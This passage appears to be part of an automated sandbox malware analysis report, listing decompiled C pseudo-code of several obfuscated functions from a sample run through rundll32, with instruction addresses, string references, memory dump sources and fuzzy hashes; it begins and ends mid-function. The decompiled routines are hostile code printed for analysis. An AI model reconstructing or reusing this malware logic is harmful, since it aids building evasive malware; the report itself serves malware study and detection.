							__eflags = E0020D290(_v84, _v88, _v64, _t162 + 8, _v92,  &_v52);
							_t163 =  !=  ? 1 : _t163;
						} else {
							if(_t144 == 0x2713230a) {
								_t135 = E001F9899(_t162, _v68, __eflags,  &_v52, _v56, _v72, _v76);
								_t166 =  &(_t166[4]);
								__eflags = _t135;
								if(__eflags != 0) {
									_t144 = 0x14ed0f49;
									continue;
								}
							} else {
								if(_t144 != 0x2ae8b971) {
									goto L9;
								} else {
									E0020F3E9(_v96, _v80, _v60, _a12,  &_v52);
									_t166 =  &(_t166[3]);
									_t144 = 0x2713230a;
									continue;
								}
							}
						}
						L12:
						return _t163;
					}
					_t144 = 0x2ae8b971;
					L9:
					__eflags = _t144 - 0x88de44a;
				} while (__eflags != 0);
				goto L12;
			}

0x0020db2c
0x0020db33
0x0020db37
0x0020db3e
0x0020db45
0x0020db46
0x0020db47
0x0020db48
0x0020db4d
0x0020db55
0x0020db58
0x0020db62
0x0020db67
0x0020db69
0x0020db6e
0x0020db73
0x0020db7b
0x0020db83
0x0020db8b
0x0020db90
0x0020db98
0x0020dba0
0x0020dba5
0x0020dbad
0x0020dbb5
0x0020dbc1
0x0020dbc4
0x0020dbc8
0x0020dbd0
0x0020dbd8
0x0020dbdd
0x0020dbe5
0x0020dbed
0x0020dbf2
0x0020dbf6
0x0020dbfe
0x0020dc06
0x0020dc0e
0x0020dc13
0x0020dc1b
0x0020dc23
0x0020dc2b
0x0020dc33
0x0020dc3b
0x0020dc43
0x0020dc53
0x0020dc57
0x0020dc63
0x0020dc68
0x0020dc6e
0x0020dc76
0x0020dc7e
0x0020dc86
0x0020dc8e
0x0020dc96
0x0020dca3
0x0020dca6
0x0020dcb2
0x0020dcba
0x0020dcbd
0x0020dcc6
0x0020dcd3
0x0020dcd3
0x0020dcdd
0x0020dd69
0x0020dd6b
0x0020dcdf
0x0020dce5
0x0020dd29
0x0020dd2e
0x0020dd31
0x0020dd33
0x0020dd35
0x00000000
0x0020dd35
0x0020dce7
0x0020dce9
0x00000000
0x0020dceb
0x0020dd03
0x0020dd08
0x0020dd0b
0x00000000
0x0020dd0b
0x0020dce9
0x0020dce5
0x0020dd6f
0x0020dd77
0x0020dd77
0x0020dd39
0x0020dd3b
0x0020dd3b
0x0020dd3b
0x00000000

Strings

<s, xrefs: 0020DC1B
Ae, xrefs: 0020DB4D
Nn, xrefs: 0020DCC6

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <s$Ae$Nn
API String ID: 0-1679991533
Opcode ID: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
Instruction ID: 560aa5c3302d7642281394c0b96428bc9b28a12137abe59ae5fcf88f5294010b
Opcode Fuzzy Hash: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
Instruction Fuzzy Hash: A05196712093419FD368CF21C88952BBBE1FBC8348F508A1DF599922A1D7B5CA19CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002AD099, Relevance: 3.9, Strings: 3, Instructions: 142COMMON

Download Yara Rule

Strings

Ae, xrefs: 002AD0C1
<s, xrefs: 002AD18F
Nn, xrefs: 002AD23A

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <s$Ae$Nn
API String ID: 0-1679991533
Opcode ID: 6a23c4b3efd0e5e6ed7652331947701b4abf18304c46623e4a15a57f56866de0
Instruction ID: 4bdddd059dfbc6b1551d9fd3297e7b799393fbcdaf6a63752946db938ae32443
Opcode Fuzzy Hash: 6a23c4b3efd0e5e6ed7652331947701b4abf18304c46623e4a15a57f56866de0
Instruction Fuzzy Hash: 5D5167712083419FD358DF25C88961BBBE1FBC8348F508A1DF99A92261D775CA19CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00200F6D, Relevance: 3.9, Strings: 3, Instructions: 125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00200F6D() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				void* _t107;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t123;
				signed int* _t125;

				_t125 =  &_v368;
				_v336 = 0x6cd7e4;
				_v332 = 0x3eb088;
				_t107 = 0x11f8fc3e;
				_t123 = 0;
				_v328 = 0;
				_v324 = 0;
				_v340 = 0x4b20;
				_v340 = _v340 | 0xad173eb8;
				_v340 = _v340 ^ 0xad171b79;
				_v368 = 0x5c5a;
				_v368 = _v368 | 0x9193e072;
				_v368 = _v368 ^ 0x84c7a0cb;
				_t119 = 0x62;
				_v368 = _v368 / _t119;
				_v368 = _v368 ^ 0x0037af10;
				_v352 = 0x141d;
				_v352 = _v352 + 0xbd3d;
				_t120 = 0x7c;
				_v352 = _v352 * 7;
				_v352 = _v352 ^ 0x0005e092;
				_v344 = 0x5f9b;
				_v344 = _v344 | 0x8244af57;
				_v344 = _v344 ^ 0x8244aa36;
				_v360 = 0xe6d9;
				_v360 = _v360 + 0xa592;
				_v360 = _v360 / _t120;
				_t121 = 0x1b;
				_v360 = _v360 * 0x3c;
				_v360 = _v360 ^ 0x0000cf96;
				_v356 = 0x3abe;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 >> 6;
				_v356 = _v356 ^ 0x00000525;
				_v364 = 0x1f65;
				_v364 = _v364 >> 6;
				_v364 = _v364 * 0x16;
				_v364 = _v364 | 0xfb440427;
				_v364 = _v364 ^ 0xfb445ef1;
				_v348 = 0x48;
				_v348 = _v348 / _t121;
				_v348 = _v348 ^ 0x0000083a;
				do {
					while(_t107 != 0x2ebf197) {
						if(_t107 == 0x11f8fc3e) {
							_t107 = 0x2ebf197;
							continue;
						} else {
							if(_t107 == 0x13d7564d) {
								_t107 = 0x32df2d5c;
								_t123 = _t123 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t107 == 0x2725b2a4) {
									E001F8EB8(_v360, _v356,  &_v320, _v364, _v348);
									_t125 =  &(_t125[3]);
									_t107 = 0x13d7564d;
									continue;
								} else {
									if(_t107 == 0x2976fc0f) {
										_t123 = _t123 + (_v320 & 0x0000ffff);
									} else {
										if(_t107 == 0x2ab6fad8) {
											_t107 = 0x2976fc0f;
											_t123 = _t123 + _v276 * 0x64;
											continue;
										} else {
											if(_t107 != 0x32df2d5c) {
												goto L14;
											} else {
												_t107 = 0x2ab6fad8;
												_t123 = _t123 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t123;
					}
					_v284 = 0x11c;
					E00208EA4(_v340, _v368,  &_v284, _v352, _v344);
					_t125 =  &(_t125[3]);
					_t107 = 0x2725b2a4;
					L14:
				} while (_t107 != 0x1e073579);
				goto L17;
			}

0x00200f6d
0x00200f73
0x00200f7d
0x00200f85
0x00200f8d
0x00200f94
0x00200f9d
0x00200fa1
0x00200fa9
0x00200fb1
0x00200fb9
0x00200fc1
0x00200fc9
0x00200fd8
0x00200fdd
0x00200fe3
0x00200feb
0x00200ff3
0x00201000
0x00201003
0x00201007
0x0020100f
0x00201017
0x0020101f
0x00201027
0x0020102f
0x0020103f
0x00201048
0x00201049
0x0020104d
0x00201055
0x0020105d
0x00201062
0x00201067
0x0020106f
0x00201077
0x00201081
0x00201085
0x0020108d
0x00201095
0x002010a8
0x002010ac
0x002010b4
0x002010b4
0x002010c2
0x00201143
0x00000000
0x002010c4
0x002010ca
0x00201131
0x0020113c
0x00000000
0x002010cc
0x002010d2
0x0020111a
0x0020111f
0x00201122
0x00000000
0x002010d4
0x002010d6
0x00201187
0x002010dc
0x002010de
0x002010ff
0x00201101
0x00000000
0x002010e0
0x002010e6
0x00000000
0x002010ec
0x002010f4
0x002010f6
0x00000000
0x002010f6
0x002010e6
0x002010de
0x002010d6
0x002010d2
0x002010ca
0x0020118a
0x00201195
0x00201195
0x00201152
0x00201167
0x0020116c
0x0020116f
0x00201174
0x00201174
0x00000000

Strings

H, xrefs: 00201095
Z\, xrefs: 00200FB9
K, xrefs: 00200FA1

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K$H$Z\
API String ID: 0-1080206182
Opcode ID: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction ID: f808c5cb92ad12d13f046cc090bf432a4667ccb09305b26b6e334602fac46be5
Opcode Fuzzy Hash: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction Fuzzy Hash: 43519A71508342DFD318CE25C58542FFBE2ABC8748F10891EF58AA62A1D3B5CA59CF97

Uniqueness

Uniqueness Score: -1.00%

Function 002A04E1, Relevance: 3.9, Strings: 3, Instructions: 125COMMON

Download Yara Rule

Strings

K, xrefs: 002A0515
Z\, xrefs: 002A052D
H, xrefs: 002A0609

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K$H$Z\
API String ID: 0-1080206182
Opcode ID: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction ID: a9ec7fc800326fa7aa8f38458fd7c1556b65c691f2ed90088ebb7b609e7db197
Opcode Fuzzy Hash: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction Fuzzy Hash: 9851CB715093028FD318CF21C98542FFBE5ABC9B48F04892EF486A6260D7B5CA19CF97

Uniqueness

Uniqueness Score: -1.00%

Function 0020654F, Relevance: 3.9, Strings: 3, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0020654F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t137;
				signed int _t155;
				signed int _t156;
				signed int _t157;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t137);
				_v68 = _v68 & 0x00000000;
				_v72 = 0x40327f;
				_v36 = 0xc85d;
				_v36 = _v36 ^ 0x66282df1;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x1472a435;
				_v64 = 0xf491;
				_v64 = _v64 + 0xa329;
				_v64 = _v64 ^ 0x0001adca;
				_v40 = 0xc364;
				_v40 = _v40 >> 8;
				_v40 = _v40 | 0x488121d4;
				_v40 = _v40 ^ 0x48816408;
				_v52 = 0x6da2;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x0000495a;
				_v8 = 0x312a;
				_v8 = _v8 + 0xffffef42;
				_t155 = 0x2c;
				_v8 = _v8 * 0x65;
				_v8 = _v8 + 0xce6d;
				_v8 = _v8 ^ 0x000de244;
				_v20 = 0x8561;
				_v20 = _v20 | 0x5ebc884e;
				_v20 = _v20 + 0x1144;
				_v20 = _v20 + 0xfffffd3c;
				_v20 = _v20 ^ 0x5ebcfa0f;
				_v12 = 0x1c9b;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 / _t155;
				_v12 = _v12 + 0x2960;
				_v12 = _v12 ^ 0x00001be2;
				_v60 = 0x3552;
				_t156 = 0x2b;
				_v60 = _v60 / _t156;
				_v60 = _v60 ^ 0x00001bfb;
				_v24 = 0xfa61;
				_v24 = _v24 >> 4;
				_v24 = _v24 | 0xfe7fc8bf;
				_v24 = _v24 ^ 0xfe7fec18;
				_v44 = 0xf8e3;
				_t157 = 0x73;
				_v44 = _v44 * 0x4c;
				_v44 = _v44 ^ 0x0049ee51;
				_v16 = 0x71dd;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 << 0xd;
				_v16 = _v16 * 0xd;
				_v16 = _v16 ^ 0x0016ae67;
				_v56 = 0x9b34;
				_v56 = _v56 / _t157;
				_v56 = _v56 ^ 0x000036fa;
				_v28 = 0xc6c;
				_v28 = _v28 + 0xfffffa1a;
				_v28 = _v28 + 0xffff7ee3;
				_v28 = _v28 ^ 0xffff83ef;
				_v48 = 0x101f;
				_v48 = _v48 | 0x367cb3d5;
				_v48 = _v48 ^ 0x367cc432;
				_v32 = 0x8972;
				_v32 = _v32 + 0x5a70;
				_v32 = _v32 ^ 0x29e9990a;
				_v32 = _v32 ^ 0x29e93145;
				_push(0x1f15f0);
				_push(_v40);
				E00203D3D(E0020BF25(_v36, _v64, _v32), _v32, _v52, _v8,  &_v592, _v20, _v36, _v12);
				E0020C5F7(_v60, _v24, _v44, _v16, _t148);
				return E001F3CA0(_v56, _v28, _v48,  &_v592, _v32);
			}

0x00206559
0x0020655c
0x0020655f
0x00206560
0x00206561
0x00206566
0x0020656c
0x00206573
0x0020657a
0x00206581
0x00206585
0x0020658c
0x00206593
0x0020659a
0x002065a1
0x002065a8
0x002065ac
0x002065b3
0x002065ba
0x002065c1
0x002065c4
0x002065cb
0x002065d2
0x002065df
0x002065e2
0x002065e5
0x002065ec
0x002065f3
0x002065fa
0x00206601
0x00206608
0x0020660f
0x00206616
0x0020661d
0x00206628
0x0020662b
0x00206632
0x00206639
0x00206643
0x00206648
0x0020664d
0x00206654
0x0020665b
0x0020665f
0x00206666
0x0020666d
0x00206678
0x00206679
0x0020667c
0x00206683
0x0020668a
0x0020668e
0x00206696
0x00206699
0x002066a0
0x002066ac
0x002066af
0x002066b6
0x002066bd
0x002066c4
0x002066cb
0x002066d2
0x002066d9
0x002066e0
0x002066e7
0x002066ee
0x002066f5
0x002066fc
0x00206703
0x00206708
0x00206734
0x00206746
0x0020676a

Strings

D, xrefs: 002065EC
E1), xrefs: 002066FC
QI, xrefs: 0020667C

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D$E1)$QI
API String ID: 0-3224676359
Opcode ID: f99e1ee98869406f2b953b4e8d7dd6fdd84bb65ff9d9af7f51b7d32a82dbb22e
Instruction ID: 15efba23e8b8dfc00512196e8d53f40ed6d290dd7820fe72f5d6a73375889565
Opcode Fuzzy Hash: f99e1ee98869406f2b953b4e8d7dd6fdd84bb65ff9d9af7f51b7d32a82dbb22e
Instruction Fuzzy Hash: AE51FF71D0120DABEF08CFA5D98A8EEBBB2FF04314F208149E415B62A0D7B91A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002A5AC3, Relevance: 3.9, Strings: 3, Instructions: 122COMMON

Download Yara Rule

Strings

QI, xrefs: 002A5BF0
D, xrefs: 002A5B60
E1), xrefs: 002A5C70

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D$E1)$QI
API String ID: 0-3224676359
Opcode ID: a36edd16bc02640ec52525cb1b60932c4296e9c33279347a7fbaed08528ae289
Instruction ID: 16550fa74a2423ee47abf2495857aa14c4038d73cb9aaf588c7d1c2023fbffa6
Opcode Fuzzy Hash: a36edd16bc02640ec52525cb1b60932c4296e9c33279347a7fbaed08528ae289
Instruction Fuzzy Hash: 5C51FE71D01209AFEF08CFA5D98A8EEBBB2FF04314F208159E415B62A0D7B95A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001F213E, Relevance: 3.9, Strings: 3, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E001F213E(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* _t117;
				void* _t119;
				intOrPtr* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				intOrPtr* _t138;

				_v52 = _v52 & 0x00000000;
				_v56 = 0x538da4;
				_v28 = 0x44a2;
				_v28 = _v28 + 0xffff49a8;
				_v28 = _v28 ^ 0x9ec4eed9;
				_v28 = _v28 ^ 0x613b19df;
				_v24 = 0xfb1d;
				_v24 = _v24 | 0x73dd884d;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x000060fc;
				_v20 = 0x4538;
				_v20 = _v20 << 1;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0000423d;
				_v16 = 0x1a69;
				_v16 = _v16 + 0x19e4;
				_v16 = _v16 << 6;
				_t123 = 0x59;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 ^ 0x067cf58b;
				_v12 = 0x7ce6;
				_v12 = _v12 | 0x92d22600;
				_v12 = _v12 >> 3;
				_v12 = _v12 | 0x69c09952;
				_v12 = _v12 ^ 0x7bda88d4;
				_v8 = 0xdbf1;
				_v8 = _v8 >> 2;
				_t138 = _a4;
				_v8 = _v8 * 0x21;
				_t124 = 0x64;
				_v8 = _v8 / _t123;
				_v8 = _v8 ^ 0x00003399;
				_v44 = 0x6316;
				_v44 = _v44 / _t124;
				_v44 = _v44 ^ 0x000016b9;
				_v40 = 0xc759;
				_v40 = _v40 << 5;
				_v40 = _v40 | 0x59fc130f;
				_v40 = _v40 ^ 0x59fcaabc;
				_v36 = 0xd1fd;
				_t125 = 0x6d;
				_v36 = _v36 / _t125;
				_v36 = _v36 ^ 0x863f9c53;
				_v36 = _v36 ^ 0x863f9a9b;
				_v32 = 0x7363;
				_v32 = _v32 + 0xffffb442;
				_v32 = _v32 + 0xab3e;
				_v32 = _v32 ^ 0x0000a443;
				_v48 = 0x2890;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x00113212;
				_t117 =  *((intOrPtr*)(_t138 + 0x1c))( *_t138, 1, 0);
				_t145 = _t117;
				if(_t117 != 0) {
					_push(_v20);
					_push(_v24);
					_t119 = E00202164(0x1f1338, _v28, _t145);
					_t140 = _t119;
					_push(_t119);
					_push(_v44);
					_push( *_t138);
					_push(_v8);
					_t120 = E001F3892(_v16, _v12);
					if(_t120 != 0) {
						 *_t120();
					}
					E0020C5F7(_v40, _v36, _v32, _v48, _t140);
				}
				return 0;
			}

0x001f2144
0x001f214a
0x001f2151
0x001f2158
0x001f215f
0x001f2166
0x001f216d
0x001f2174
0x001f217b
0x001f217f
0x001f2186
0x001f218d
0x001f2190
0x001f2193
0x001f219a
0x001f21a1
0x001f21a8
0x001f21b3
0x001f21b6
0x001f21b9
0x001f21c0
0x001f21c7
0x001f21ce
0x001f21d2
0x001f21d9
0x001f21e0
0x001f21e7
0x001f21ef
0x001f21f2
0x001f21fa
0x001f21fb
0x001f2200
0x001f2207
0x001f2215
0x001f221a
0x001f2221
0x001f2228
0x001f222c
0x001f2233
0x001f223a
0x001f2244
0x001f2249
0x001f224c
0x001f2253
0x001f225a
0x001f2261
0x001f2268
0x001f226f
0x001f2276
0x001f2283
0x001f2286
0x001f228f
0x001f2292
0x001f2294
0x001f2297
0x001f229f
0x001f22a5
0x001f22aa
0x001f22ac
0x001f22ad
0x001f22b0
0x001f22b2
0x001f22bb
0x001f22c5
0x001f22c7
0x001f22c7
0x001f22d6
0x001f22de
0x001f22e5

Strings

=B, xrefs: 001F2193
cs, xrefs: 001F225A
|, xrefs: 001F21C0

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =B$cs$|
API String ID: 0-3098575777
Opcode ID: 874e93467bf0de049efc15c2dec2d1672e7157dac6d99c2d34223bbaf551b7f6
Instruction ID: 5b1fa9eccacd913a56b10ec6261d5c202947ff8f647cf95d629982b58122cd61
Opcode Fuzzy Hash: 874e93467bf0de049efc15c2dec2d1672e7157dac6d99c2d34223bbaf551b7f6
Instruction Fuzzy Hash: 9D511371D0020DEBEF08CFA5C94A5EEBBB2FB58314F208059D511B6290D7BA5B54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002916B2, Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

|, xrefs: 00291734
cs, xrefs: 002917CE
=B, xrefs: 00291707

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =B$cs$|
API String ID: 0-3098575777
Opcode ID: 1895ee1b2d22936729d7252808f588b3decae4b39108610fcd2b2fd5e0d4a767
Instruction ID: 986d3b3d9dc0301f42da5538854c28ea4c28ea757e52046d6fc3dba798cce5b4
Opcode Fuzzy Hash: 1895ee1b2d22936729d7252808f588b3decae4b39108610fcd2b2fd5e0d4a767
Instruction Fuzzy Hash: 8F511371D00209EBEF08CFA1D94A6DEBBB2FB48314F208059D511B62A0D7BA5B15DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001F5EB9, Relevance: 3.9, Strings: 3, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001F5EB9(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t95;
				intOrPtr _t97;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr _t123;

				_v28 = 0x51db;
				_v28 = _v28 * 0x56;
				_v28 = _v28 ^ 0xf2cb6318;
				_v28 = _v28 ^ 0xf2d01fca;
				_v12 = 0x641f;
				_t107 = 0x36;
				_v12 = _v12 * 0x49;
				_v12 = _v12 ^ 0x001cda68;
				_v24 = 0xc595;
				_v24 = _v24 | 0x40e4949d;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0103f279;
				_v36 = 0xae24;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 << 1;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x0001302d;
				_v20 = 0x229b;
				_v20 = _v20 | 0xaeee7ef1;
				_v20 = _v20 ^ 0xaeee687d;
				_v8 = 0x637e;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x000003e0;
				_v4 = 0xedda;
				_v4 = _v4 | 0x32cb1c6d;
				_v4 = _v4 ^ 0x32cbfe7d;
				_v16 = 0xace9;
				_v16 = _v16 * 3;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x00006a5d;
				_v32 = 0xe450;
				_v32 = _v32 | 0xfff2f3f7;
				_v32 = _v32 ^ 0x3a9b7228;
				_v32 = _v32 ^ 0xc569ebde;
				_t95 = E00204237();
				_t120 = _a4;
				_t122 = _t95;
				_v28 = 0x89bb;
				_v28 = _v28 ^ 0xf4290def;
				_v28 = _v28 + 0xffff042c;
				_v28 = _v28 ^ 0xf4288880;
				_t124 = _t120 + 0x24;
				_t106 = E0020C424(_t120 + 0x24, _v36);
				_t97 =  *((intOrPtr*)(_t120 + 8));
				if(_t97 != _v28 && _t97 != _t122) {
					_t110 =  *((intOrPtr*)(_t120 + 0x18));
					if(_t110 != _v28 && _t110 != _t122) {
						_t121 = _a8;
						_t111 =  *_t121;
						if(E001F8B2D(_t111, _t106) == 0) {
							_push(_t111);
							_t123 = E002057E8(0x234);
							if(_t123 != 0) {
								_t83 = _t123 + 0x2c; // 0x2c
								E00205891(_t124, _t83, _v4, _v16, _v32);
								 *((intOrPtr*)(_t123 + 0x24)) = _t106;
								 *((intOrPtr*)(_t123 + 0x1c)) =  *_t121;
								 *_t121 = _t123;
							}
						}
					}
				}
				return 1;
			}

0x001f5ebc
0x001f5ecf
0x001f5ed3
0x001f5edb
0x001f5ee3
0x001f5ef2
0x001f5ef3
0x001f5ef7
0x001f5eff
0x001f5f07
0x001f5f0f
0x001f5f14
0x001f5f1c
0x001f5f24
0x001f5f29
0x001f5f2d
0x001f5f32
0x001f5f3a
0x001f5f42
0x001f5f4a
0x001f5f52
0x001f5f60
0x001f5f64
0x001f5f6c
0x001f5f74
0x001f5f7c
0x001f5f84
0x001f5f91
0x001f5f95
0x001f5f9a
0x001f5fa2
0x001f5faa
0x001f5fb2
0x001f5fba
0x001f5fca
0x001f5fcf
0x001f5fd3
0x001f5fd5
0x001f5fdd
0x001f5fe5
0x001f5fed
0x001f5ff5
0x001f6007
0x001f6009
0x001f6011
0x001f6017
0x001f601e
0x001f6024
0x001f602a
0x001f6033
0x001f603d
0x001f6048
0x001f604d
0x001f6053
0x001f6060
0x001f6065
0x001f606d
0x001f6070
0x001f6070
0x001f604d
0x001f6033
0x001f601e
0x001f607c

Strings

~c, xrefs: 001F5F52
P, xrefs: 001F5FA2
]j, xrefs: 001F5F9A

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: P$]j$~c
API String ID: 0-2734922740
Opcode ID: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
Instruction ID: f8a89a3398a09f01eff30997a194a533bce7c2b6de2a01ca714cb0b80fbb7966
Opcode Fuzzy Hash: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
Instruction Fuzzy Hash: A54102711083469FC358CF21D58541BFBE0FB88798F244A1DF5DAA62A0C774EA99CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0029542D, Relevance: 3.9, Strings: 3, Instructions: 106COMMON

Download Yara Rule

Strings

P, xrefs: 00295516
~c, xrefs: 002954C6
]j, xrefs: 0029550E

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: P$]j$~c
API String ID: 0-2734922740
Opcode ID: f0d99d9e9edd7567189a36c17bff5cb35f75fb775b6de6c08ae6568578f72acb
Instruction ID: d2805a988882607ad5bdbf57b5b009b79ca66e7893dbd1e6f90e00c416096227
Opcode Fuzzy Hash: f0d99d9e9edd7567189a36c17bff5cb35f75fb775b6de6c08ae6568578f72acb
Instruction Fuzzy Hash: FF4121712087429FC359CF21D58540BFBE1FBC8788F104A1DF49AA6260C774EA99CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001F8816, Relevance: 3.8, Strings: 3, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001F8816(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
				void* _t108;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t133;

				_v28 = 0x78e3;
				_v28 = _v28 | 0x7135a14a;
				_v28 = _v28 + 0x1554;
				_v28 = _v28 ^ 0x7136354d;
				_v8 = 0x9c2;
				_t117 = 0x5f;
				_v8 = _v8 / _t117;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xd7261730;
				_v8 = _v8 ^ 0xd7260392;
				_v24 = 0xd04a;
				_v24 = _v24 + 0xa8bc;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0xbc833dba;
				_v40 = 0x60a0;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x000011f0;
